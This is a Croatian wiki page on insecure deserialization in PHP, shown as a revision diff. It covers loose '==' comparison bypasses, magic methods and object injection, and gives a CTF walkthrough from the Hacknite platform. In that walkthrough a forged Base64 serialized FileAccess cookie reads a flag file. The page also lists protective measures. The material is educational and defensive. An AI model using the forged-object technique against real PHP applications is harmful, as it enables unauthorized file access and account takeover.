| Both sides previous revisionPrevious revisionNext revision | Previous revision |
| deserializacija [2023/11/30 14:57] – zrinka | deserializacija [2025/12/01 11:40] (current) – external edit 127.0.0.1 |
|---|
| ====Nesigurna deserijalizacija==== | ====Nesigurna deserijalizacija==== |
| |
| **Serijalizacija** je proces pretvaranja složenijih tipova podataka u jednostavniji oblik, primjerice u niz bajtova. Svrha je zapisati podatke u obliku u kojem se ti podatci mogu zapisati u datoteku, slati mrežom ili pohraniti u bazu podataka. Primjeri formata u koji se pohranjuju podatci su binarni zapis, JSON (//JavaScript Object Notation//) i XML (//Extensible Markup Language//). **Deserijalizacija** je obrnut proces. On iz sažetog zapisa podataka rekonstruira objekt koji je serijaliziran. Deserijalilziran objekt mora biti jednak originalnom, obuhvatiti sve njegove funkcionalnosti i mora moći imati interakcije s web stranicom kao i originalni objekt. | **Serijalizacija** je proces pretvaranja složenijih tipova podataka u jednostavniji oblik. Svrha je pohraniti podatke u obliku u kojem se oni mogu zapisati u datoteku, slati mrežom ili pohraniti u bazu podataka. Primjeri formata u koji se pohranjuju podatci su binarni zapis, JSON (//JavaScript Object Notation//) i XML (//Extensible Markup Language//). \\ |
| | **Deserijalizacija** je obrnut proces. Iz sažetog zapisa podataka rekonstruira se objekt koji je nekad prije bio serijaliziran. Deserijaliziran objekt mora biti jednak originalnom, obuhvatiti sve njegove funkcionalnosti i mora moći obavljati sve interakcije s web stranicom kao i original. |
| |
| **Nesigurna deserijalizacija** (eng. //Insecure deserialization//) javlja se na web stranicama koje deserijaliziraju podatke koje unose korisnici. U idealnom slučaju, nikad se ne bi trebali izravno koristiti podatci koje unosi korisnik jer svaki korisnik može biti zlonamjeran i unijeti podatke koji mogu izazvati štetu. Usprkos svim provjerama koje stranica može provesti, vrlo je teško pokriti sve slučajeve i potpuno osigurati. Osim toga, vrlo često web stranica mora deserijalizirati podatke prije nego što uopće prepozna da je uneseno nešto maliciozno, a tad već bude prekasno. Dodatan je problem što moderne stranice, kako bi imale što više funkcionalnosti, često implementiraju velik broj bibioteka, koje svaka za sebe imaju mnogo različitih metoda i klasa. Zbog toga već samo na razini jedne stranice postoji velik broj klasa i metoda koje se ponašaju različito i teško je osigurati stranicu tako da se pokriju sve njihove sigurnosne rupe. Teško je i predvidjeti koja će se od tih brojnih metoda pozvati nad malicioznim podatcima, što znači da ne možemo predvidjeti ponašanje web stranice ako krene deserijalizirati nesigurne podatke. Zato su i posljedice vrlo širokog spektra. Napadač može dobiti mogućnost remote code executiona, a u slučaju da stranica ima dobru zaštitu protiv toga, može dovesti do eskalacije privilegija, pristupa nasumičnim datotekama i DOS napadima. (?? doraditi) | **Nesigurna deserijalizacija** (eng. //Insecure deserialization//) javlja se na web stranicama koje deserijaliziraju podatke koje unose korisnici. U idealnom slučaju, nikad se ne bi trebao izravno deserijalizirati korisnički unos jer svaki korisnik može biti zlonamjeran i unijeti podatke koji će izazvati štetu. Usprkos tomu što stranice provode različite provjere nad unesenim podatcima, vrlo je teško pokriti sve moguće slučajeve. Osim toga, često web stranica mora barem početi deserijalizaciju podataka prije nego što prepozna da je uneseno nešto maliciozno, a tad već može biti prekasno. Dodatan je problem što moderne stranice, kako bi imale što više funkcionalnosti, implementiraju velik broj biblioteka. Zbog toga već samo na razini jedne web stranice postoji velik broj klasa i metoda. Ne može se uvijek predvidjeti koja će se od tih brojnih metoda pozvati nad deserijaliziranim podatcima jer oni mogu biti različitih klasa, što znači da ne možemo predvidjeti ponašanje web stranice ako krene deserijalizirati nesigurne podatke. Zato su i posljedice vrlo širokog spektra. Napadač može dobiti mogućnost //remote code executiona//, a u slučaju da stranica ima dobru zaštitu protiv toga, i dalje može doći do eskalacije privilegija, pristupa nasumičnim datotekama i DoS (//Denial-of-Service//) napada. |
| |
| Jedna od ranjivosti PHP-a koja se koristi pri deserijalizaciji je činjenica da dopušta operator "==" koji je manje strog od klasičnog operatora jednakosti "===". Pokaza ćemo razliku na ovom primjeru: | Jedna od ranjivosti PHP-a koja se koristi pri deserijalizaciji je činjenica da postoji operator "==" koji je manje strog od klasičnog operatora jednakosti "===". Pokazat ćemo razliku na ovom primjeru: |
| <code php> | <code php> |
| 5 === "5" //False | 5 === "5" //vraća False |
| 5 == "5" //True | 5 == "5" //vraća True |
| </code> | </code> |
| Ovakva razlika između dvaju operatora jedakosti postoji u još nekim programskim jezicima, primjerice u JavaScriptu. Međutim, ovdje je ta razlika izraženija. Naime, ove će dvije tvrdnje također rezultirati istinom: | Operator "===" uspoređuje vrijednosti lijeve i desne strane, ali i tipove podataka. Budući da je na lijevoj strani broj (//integer//), a na desnoj niz znakova (//string//), operator vraća //False//, iako su im vrijednosti iste. S druge strane, operator "==" uspoređuje samo vrijednosti lijeve i desne strane te zato vraća //True//. Ovakva razlika između dvaju operatora jednakosti postoji u još nekim programskim jezicima, primjerice u JavaScriptu. Međutim, ovdje je ta razlika izraženija. Naime, ove će dvije tvrdnje rezultirati istinom, iako intuitivno ne bi trebale: |
| <code php> | <code php> |
| 5 == "5 i još nešto" | 5 == "5 i još nešto" |
| 0 == "nešto" | 0 == "nešto" |
| </code> | </code> |
| Prvi je string donekle intuitivan. Operator usporedbe na desnoj strani nakon što prođe prvi znak stringa i usporedi ga s lijevom stranom nailazi na jednakost i vraća istinu. Ostatak stringa se potpuno ignorira. Međutim, drugi slučaj je onaj koji stvara sigurnosne probleme. Naime, PHP će string "nešto" tretirati kao integer 0 jer u njemu nema brojeva. Već sad vidimo da je to logički neispravno. Uzmimo napadača koji je na web stranici koja deserijalizira podatke. Izmijenio je varijablu //$password// tako da ne sadrži brojeve. Ako korisnikova lozinka ne sadrži brojeve, izjednačavanje korisnikove lozinke s varijablom //$password// će uvijek vraćati istinu. Na ovaj će se način napadač bez problema ulogirati kao neki drugi korisnik bez da zna njegovu lozinku: | Prva se tvrdnja donekle se može shvatiti istinom jer je barem početak desne strane jednak lijevoj strani. Međutim, druga je je semantički pogrešna i stvara veće sigurnosne probleme. Naime, PHP će ovdje niz znakova //"nešto"// tretirati kao broj 0 jer u nizu nema znamenki. Uzmimo web stranicu koja deserijalizira podatke i provjerava podatke ovim kôdom: |
| <code php> | <code php> |
| $login = unserialize($_COOKIE) | $login = unserialize($_COOKIE) |
| if ($login['password'] == $password) { | if ($login['password'] == $password) { |
| // log in successfully | // uspjeh |
| } | } |
| </code> | </code> |
| | Unesena lozinka korisnika gleda se tako što se deserijalizira sve što se nalazi u kolačiću iz toga izvuče atribut //password//. Recimo da je napadač unio broj 0. Ako lozinka korisnika kojemu provaljuje u račun (varijabla //$password//) ne sadrži brojeve, izjednačavanje unesene lozinke s njom će vratiti istinu, odnosno sustav će unesenu lozinku tretirati kao ispravnu, iako je zapravo možda potpuno različita od prave. Važno je napomenuti da ovo funkcionira samo zbog razloga što deserijalizacija čuva tip podatka. Da se lozinka gledala direktno iz polja za unos, broj 0 pretvorio bi se u niz znakova "0", a tada bi usporedba bila neistinita. |
| |
| | ===Magične metode=== |
| | U PHP-u i još nekim programskim jezicima postoje tzv. **magične metode**. To su metode koje se automatski pozivaju u određenim situacijama. Objektno orijentirani jezici (primjerice Java), u modeliranju rješenja problema koriste se objektima. Objekti se mogu stvarati i uništavati te svako stvaranje objekta potakne pozivanje metode - **konstruktora**. U Pythonu je to //%%__init__%%//, u PHP-u //construct()// itd. Konstruktor je, dakle, jedan od primjera magičnih metoda. Sâmo postojanje magičnih metoda ne predstavlja ranjivost, no problem je kad se one izravno koriste podatcima koje unose korisnici jer se pozivanje tih metoda ne može spriječiti. Još je veći problem kad postoje magične metode prilikom deserijalizacije podataka kao što je slučaj u PHP-u. Metoda //unserialize()// automatski poziva metodu //%%__wakeup()%%//. Dakle, čak i ako neki podatci neće proći deserijalizaciju (primjerice, ako metoda //unserialize()// prepozna grešku), i dalje je moguće da se pokrene poziv metode //%%__wakeup()%%// i da se napravi šteta. |
| | |
| | ===Umetanje nasumičnih objekata=== |
| | U objektno orijentiranim jezicima objekt pripada nekoj klasi. Klasa se može shvatiti kao vrsta objekta, a objekt je instanca klase. Primjerice, drveće bi se moglo modelirati klasom, a svako drvo za sebe jednim objektom. Svako drvo ima grane, listove i deblo te svako može raditi iste stvari (stvarati grane, pupove listova, odbaciti listove, promijeniti boju lista...). Na isti način, svaka klasa u programskom jeziku ima definirane atribute i metode koje se mogu zvati nad objektima koji pripadaju toj klasi. Atributi su osobine objekta, ono što on posjeduje, a metode su akcije koje objekt može obaviti ili koje se mogu obaviti nad njime.\\ |
| | Napadač može manipulirati koje će klase biti objekt poslan na deserijalizaciju. Kažemo da je umetnut //nasumičan// objekt jer u pravilu u svakoj stranici postoji mnogo klasa objekata koje se koriste pa je teško predvidjeti koju će od njih napadač odabrati da bi izazvao grešku. Uobičajeno programski jezici imaju mehanizme prepoznavanja neočekivanih tipova podataka pa će slanje objekta neke druge klase obično izazvati grešku (//error//) ili iznimku (//exception//). Ipak, to ne mora uvijek biti dovoljna zaštita jer je moguće da je objekt već ušao u sustav. |
| | \\ |
| | \\ |
| | \\ |
| | **__PRIMJER__: Zadatak s Hacknite platforme - Autentifikacija bez lozinke** |
| | <file> |
| | Istražujući internet, Ana je otkrila inovativan način kako se prijaviti u sustav kao admin bez potrebnog |
| | korisničkog imena ili lozinke. Zadovoljna svojim otkrićem, spremila je vrlo zanimljivu informaciju na |
| | /usr/local/flag.txt, no za pristup toj informaciji potrebno je prijaviti se u sustav kao admin. |
| | |
| | Flag je u formatu CTF2021[brojevi] |
| | |
| | http://chal.platforma.hacknite.hr:10014 |
| | |
| | </file> |
| | |
| | U prilogu se nalazi i php datoteka stranice. Važan dio kôda je: |
| | <code php> |
| | if (!isset($_COOKIE["message"])) { |
| | $defaultFileAccess = new FileAccess(); |
| | $defaultFileAccess->set_filename("/usr/local/default.txt"); |
| | setcookie("message", base64_encode(serialize($defaultFileAccess)), |
| | [ "path" => $_SERVER["REQUEST_URI"] ]); |
| | } |
| | </code> |
| | Klasa //FileAccess// definirana je u istoj datoteci.\\ |
| | Vidimo da, ako nije postavljen //message// parametar kolačića, atribut //filename// varijable //$defaultFileAccess// postavlja se na vrijednost "/usr/local/default.txt", a u //message// parametar ulazi taj objekt koji je serijaliziran i čija je vrijednost kodirana preko //Base64//. Ukratko, putanja do datoteke kojoj gost ima pristup (default.txt) zadaje se unutar nekog objekta koji se serijalizira i zatim kodira. \\ |
| | Pokušajmo poslati zahtjev za flagom i presresti ga koristeći [[burp|Burp Suite]]. Otvorimo njegov ugrađeni preglednik te uključimo opciju //Intercept//. Zatim odaberimo "Flag" s navigacije na vrhu stranice. |
| | |
| | {{ :auth1.png?600 |}} |
| | |
| | Napišimo sad php skriptu s pomoću koje ćemo kodirati preko //Base64//. Za provjeru ćemo kodirati vrijednost "/usr/local/default.txt" jer znamo da je naš zahtjev usmjeren tamo. Skripta treba izgledati ovako: |
| | <code php> |
| | <?php |
| | class FileAccess { |
| | private $filename; |
| | function set_filename($filename){ |
| | $this->filename=$filename; |
| | } |
| | function get_file(){ |
| | return file_get_contents($this->filename); |
| | } |
| | } |
| | $defaultFileAccess = new FileAccess(); |
| | $defaultFileAccess->set_filename("/usr/local/default.txt"); |
| | //zasad ostavimo zadanu putanju radi provjere kako skripta radi |
| | echo base64_encode(serialize($defaultFileAccess)); |
| | ?> |
| | </code> |
| | |
| | Implementacija klase //FileAccess// prepisana je iz datoteke koja je priložena zadatku. \\ |
| | Rezultat ove skripte identičan je onome što vidimo u //message// parametru našeg zahtjeva, dakle implementirali smo kodiranje na isti način kao i web stranica. Promijenimo sad parametar funkcije //set_filename()// u željenu putanju "/usr/local/flag.txt". Dobili smo: |
| | <code>TzoxMDoiRmlsZUFjY2VzcyI6MTp7czoyMDoiAEZpbGVBY2Nlc3MAZmlsZW5hbWUiO3M6MTk6Ii91c3IvbG9jYWwvZmxhZy50eHQiO30</code> |
| | |
| | To ćemo unijeti u //message// parametar i proslijediti zahtjev. Na stranici se pojavio flag.\\ |
| | __Savjet__: Za izvođenje jednostavnijih programa mogu se koristiti i online prevoditelji, primjerice https://www.programiz.com/php/online-compiler/. |
| | \\ |
| | \\ |
| | \\ |
| | ===Mjere zaštite=== |
| | Za sigurniju deserijalizaciju preporučljivo je koristiti se formatima koji imaju dobro definirana pravila deserijaliziranja, primjerice JSON ili XML. Na taj se način smanjuje vjerojatnost da će netko unijeti neku dodatnu logiku prilikom deserijalizacije jer je već mnogo toga jasno definirano.\\ |
| | Poželjno je složiti aplikaciju tako da ona pri serijalizaciji označi svaki podatak nekom vrstom potpisa. Zatim prije deserijalizacije treba provjeriti postoji li taj potpis te, ako ga nema, odbaciti podatak jer je vjerojatno maliciozan. Tako se može spriječiti ubacivanje štetnih podataka od strane napadača.\\ |
| | Neki jezici implementiraju zaštitu podataka koji se serijaliziraju. Primjerice, u Javi postoji sučelje //Serializable// koje mora implementirati svaka klasa objekata ako se oni serijaliziraju. Ako postoje podatci koji se ne smiju serijalizirati, njih treba označiti kao //private transient//. //Private// znači da se taj podatak ne bi trebao vidjeti niti u jednoj klasi izvan one u kojoj je definiran. //Transient// je ono što zapravo sprečava serijalizaciju podatka. \\ |
| | Postoje mnogi alati i biblioteke čija je zadaća osigurati deserijalizaciju, primjerice Javini //SerialKiller// i //NotSoSerial// te //Serial Whitelist Application Trainer// (SWAT) i mnogi drugi. |
| |
| | |
| [3]https://portswigger.net/web-security/deserialization\\ | [3]https://portswigger.net/web-security/deserialization\\ |
| [4]https://portswigger.net/web-security/deserialization/exploiting\\ | [4]https://portswigger.net/web-security/deserialization/exploiting\\ |
| | [5]https://platforma.hacknite.hr/\\ |
